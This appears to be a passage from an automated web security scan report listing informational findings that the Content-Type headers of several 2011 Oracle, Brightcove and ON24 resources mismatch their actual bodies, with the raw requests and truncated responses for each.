31.33. http://blogs.oracle.com/theme/scripts/clientSideInclude.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.oracle.com
Path:   /theme/scripts/clientSideInclude.js

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /theme/scripts/clientSideInclude.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/entry/we_wish_jim_grays_accomplishme
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343700623; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Ftags%2Fdatabase%3Fpage%3D1; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Ftags%25252Fdatabase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Fotn%25252Fentry%25252Fwe_wish_jim_grays_accomplishme%2526ot%253DA

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 19:28:04 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=248;ecid=51681369811325973,0:1)
Content-Length: 2209
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:15:01 GMT
Connection: close

/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. The ASF licenses this file to You
* under the Apache License, Version 2.0 (the "License"); y
...[SNIP]...

31.34. http://blogs.oracle.com/theme/scripts/roller.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.oracle.com
Path:   /theme/scripts/roller.js

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /theme/scripts/roller.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/entry/we_wish_jim_grays_accomplishme
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343700623; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Ftags%2Fdatabase%3Fpage%3D1; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Ftags%25252Fdatabase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Fotn%25252Fentry%25252Fwe_wish_jim_grays_accomplishme%2526ot%253DA

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 19:28:04 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=82;ecid=51681356926423946,0:1)
Content-Length: 6164
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:15:01 GMT
Connection: close

/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. The ASF licenses this file to You
* under the Apache License, Version 2.0 (the "License"); y
...[SNIP]...

31.35. http://content.plymedia.com/initialize

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.plymedia.com
Path:   /initialize

Issue detail

The response contains the following Content-type statement: The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /initialize?video=http%3A%2F%2Flink.brightcove.com%2Fservices%2Fplayer%2Fbcpid1640183659%3Fbctid%3D909846690001 HTTP/1.1
Host: content.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s1bwwjcc2333zalrmiy15feu

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:14:08 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:08 GMT
Content-Length: 627
Connection: keep-alive

<!--9/6/2011 11:12:59 AM--><VideoInformation><Video><VideoId>f979c890-22ec-412f-8e2c-df70d1568052</VideoId><Domain>Oracle</Domain><Duration>471.03</Duration><Url>http://content.plymedia.com/Video/Play
...[SNIP]...

31.36. http://dynpages-mktas.oracle.com/pls/ebn/swf_viewer.load

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dynpages-mktas.oracle.com
Path:   /pls/ebn/swf_viewer.load

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/ebn/swf_viewer.load HTTP/1.1
Host: dynpages-mktas.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:35 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 52
Connection: close
Content-Type: text/html; charset=UTF-8

Error: loading demo ...<p>
ORA-01403: no data found

31.37. http://education.oracle.com/education/css/oracle.css

Summary

Severity:   Information
Confidence:   Firm
Host:   http://education.oracle.com
Path:   /education/css/oracle.css

Issue detail

The response contains the following Content-type statement: The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /education/css/oracle.css HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/header?p_org_id=1001&lang=US
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "2214d8-3998-4a65aaa4"
Content-Type: text/css
Last-Modified: Tue, 21 Jul 2009 11:46:44 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=1;ecid=144115375327383499,0)
Content-Length: 14744
Date: Sat, 03 Sep 2011 05:26:33 GMT
Accept-Ranges: bytes

<STYLE TYPE="text/css">
html, body {padding:0;margin:0;}
.betastuff { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; text-decoration: none }

.bodylink {font-family: Arial
...[SNIP]...

31.38. http://education.oracle.com/pls/web_prod-plq-dad/Webreg_Search_Results.get_countries

Summary

Severity:   Information
Confidence:   Firm
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/Webreg_Search_Results.get_countries

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/web_prod-plq-dad/Webreg_Search_Results.get_countries?p_countries=1001&p_org_id=1001&p_lang=US HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=501
Cookie: SearchParams-cookie=%3CSearchParams%20type%3D%22SearchParams%22%3E%0A%20%20%20%3Ckeyword%20type%3D%22string%22%3Exss%3C/keyword%3E%0A%20%20%20%3Cstart_month%20type%3D%22string%22%3E%3C/start_month%3E%0A%20%20%20%3Cstart_year%20type%3D%22string%22%3E%3C/start_year%3E%0A%20%20%20%3Cend_month%20type%3D%22string%22%3E%3C/end_month%3E%0A%20%20%20%3Cend_year%20type%3D%22string%22%3E%3C/end_year%3E%0A%20%20%20%3Cfrom_date%20type%3D%22string%22%3E%3C/from_date%3E%0A%20%20%20%3Cto_date%20type%3D%22string%22%3E%3C/to_date%3E%0A%20%20%20%3Ccountries%20type%3D%22string%22%3E1001%3C/countries%3E%0A%20%20%20%3Cslocation%20type%3D%22string%22%3E%3C/slocation%3E%0A%20%20%20%3Ccategory_id%20type%3D%22string%22%3E%3C/category_id%3E%0A%20%20%20%3Cformat%20type%3D%22string%22%3E%3C/format%3E%0A%20%20%20%3CmaterialLang%20type%3D%22string%22%3E%3C/materialLang%3E%0A%20%20%20%3CspokenLang%20type%3D%22string%22%3E%3C/spokenLang%3E%0A%20%20%20%3CadvancedSearch%20type%3D%22string%22%3EY%3C/advancedSearch%3E%0A%20%20%20%3CforceExpSearch%20type%3D%22string%22%3E%3C/forceExpSearch%3E%0A%20%20%20%3CcopyObject%20type%3D%22Function%22%3E%0A%3C%21%5BCDATA%5Bfunction%20copyObject%28_obj%29%20%7B%0A%20%20%20%20this.keyword%20%3D%20_obj.keyword%3B%0A%20%20%20%20this.category_id%20%3D%20_obj.category_id%3B%0A%20%20%20%20this.format%20%3D%20_obj.format%3B%0A%20%20%20%20this.start_month%20%3D%20_obj.start_month%3B%0A%20%20%20%20this.start_year%20%3D%20_obj.start_year%3B%0A%20%20%20%20this.end_month%20%3D%20_obj.end_month%3B%0A%20%20%20%20this.end_year%20%3D%20_obj.end_year%3B%0A%20%20%20%20this.slocation%20%3D%20_obj.slocation%3B%0A%20%20%20%20this.countries%20%3D%20_obj.countries%3B%0A%20%20%20%20this.materialLang%20%3D%20_obj.materialLang%3B%0A%20%20%20%20this.forceExpSearch%20%3D%20_obj.forceExpSearch%3B%0A%20%20%20%20this.advancedSearch%20%3D%20_obj.advancedSearch%3B%0A%7D%5D%5D%3E%20%20%20%3C/copyObject%3E%0A%3C/SearchParams%3E%0A; BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value

Response

HTTP/1.1 200 OK
Content-Length: 4018
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115328082786817,0)
Date: Tue, 06 Sep 2011 16:02:22 GMT

<span style="color:BLACK; font-size:12px; font-weight:bold;">United States :</span>#AK#AK - Anchorage#AR#AR - Fayetteville#AR - Rogers#AZ#AZ - Phoenix#CA#CA - Belmont#CA - Burbank#CA - Carlsbad#CA - E
...[SNIP]...

31.39. https://event.on24.com/eventRegistration/prereg/register.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://event.on24.com
Path:   /eventRegistration/prereg/register.jsp

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /eventRegistration/prereg/register.jsp HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Content-Length: 61
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


Missing clientid parameter

31.40. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/feed-icon-14x14.jpg

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:08 GMT
ETag: "5.5.30-ad155f4dae3c8bbb7b41e77153238054-503"
Content-Type: text/plain
Content-Length: 503
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

......JFIF.....G.G.....C...........    ...    .......

.

........................... ...C.............. ..........................................
...[SNIP]...

31.41. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/info_company.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT
ETag: "5.5.30-31aaea14c05fcefb6736e09849bcc8e4-1711"
Content-Type: text/plain
Content-Length: 1711
Date: Tue, 06 Sep 2011 16:13:19 GMT
Connection: keep-alive

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

31.42. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/oralogo_small.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT
ETag: "5.5.30-82f0a9b75571a56326f5d9340ef962ef-2059"
Content-Type: text/plain
Content-Length: 2059
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

31.43. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

Summary

Severity:   Information
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/otn_new.css

Issue detail

The response's Content-Type header states that it contains plain text (text/plain). However, the body actually appears to be CSS.

Request

GET /forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:10 GMT
ETag: "5.5.30-50ebcb915812177e8f99db0d9eb394bd-18986"
Content-Type: text/plain
Content-Length: 18986
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive
Vary: Accept-Encoding

/* MASTER FONT FACES */
BODY,H1,H2,H3,H4 {font-family:arial,helvetica,sans-serif;}

/* used to remove double space issue in pre tags*/
.jive-message-body pre br, textEditor pre br { display:none;
...[SNIP]...

31.44. https://forums.oracle.com/forums/themes/english/resources/s_code.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/s_code.js

Issue detail

The response's Content-Type header states that it contains plain text (text/plain). However, the body actually appears to be script (JavaScript).

Request

GET /forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-efb6224f9f8ad100cccc06d67aaeea0a-29511"
Content-Type: text/plain
Content-Length: 29511
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

31.45. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/s_code_forums.js

Issue detail

The response's Content-Type header states that it contains plain text (text/plain). However, the body actually appears to be script (JavaScript).

Request

GET /forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-82e1f8bbd97835a17866085b364ebf72-5398"
Content-Type: text/plain
Content-Length: 5398
Date: Tue, 06 Sep 2011 16:13:17 GMT
Connection: keep-alive

/* Setting the s_account */
function s_setAccount(){
var s_account="";
var curUrl = location.href;
   
       if(curUrl.indexOf("-stage") != -1 ) {
               s_account = "oracledevall,oracledevforum1";
       }
...[SNIP]...

31.46. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/spacer.gif

Issue detail

The response's Content-Type header states that it contains plain text (text/plain). However, the body actually appears to be a GIF image: it begins with the GIF89a signature.

Request

GET /forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:11 GMT
ETag: "5.5.30-c895ce2a9c0546d80965bd3eeafcf070-43"
Content-Type: text/plain
Content-Length: 43
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

GIF89a.............!.......,...........D..;

31.47. https://forums.oracle.com/forums/themes/english/resources/style.css

Summary

Severity:   Information
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/style.css

Issue detail

The response's Content-Type header states that it contains plain text (text/plain). However, the body actually appears to be CSS.

Request

GET /forums/themes/english/resources/style.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-454e44ddb000046027da50612f1e4157-45429"
Content-Type: text/plain
Content-Length: 45429
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive
Vary: Accept-Encoding


/* --------------------------------------------- */
/* Global Jive Forums 5.x Stylesheet */
/* --------------------------------------------- */

/* ----------------------------------
...[SNIP]...

31.48. http://goku.brightcove.com/1pix.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goku.brightcove.com
Path:   /1pix.gif

Issue detail

The response's Content-Type header states that it contains plain text (text/plain). However, the body actually appears to be a GIF image: it begins with the GIF89a signature.

Request

GET /1pix.gif?dcsdat=1315343574519&playerURL=http%3A//blogs.oracle.com/otn/&flashVer=WIN%2010%2C3%2C183%2C7&lang=en&dcssip=&os=Windows%20Server%202008%20R2&dcsref=http%3A//www.oracle.com/technetwork/index.html%3FssSourceSiteId%3Docomen&affiliateId=&publisherId=1460825906&playerId=1640183659&time=900&dcsuri=/viewer/player_load&mem=5512&sourceId=1460825906&playerTag= HTTP/1.1
Host: goku.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:58 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 49
Content-Type: text/plain

GIF89a...................!.......,...........T..;

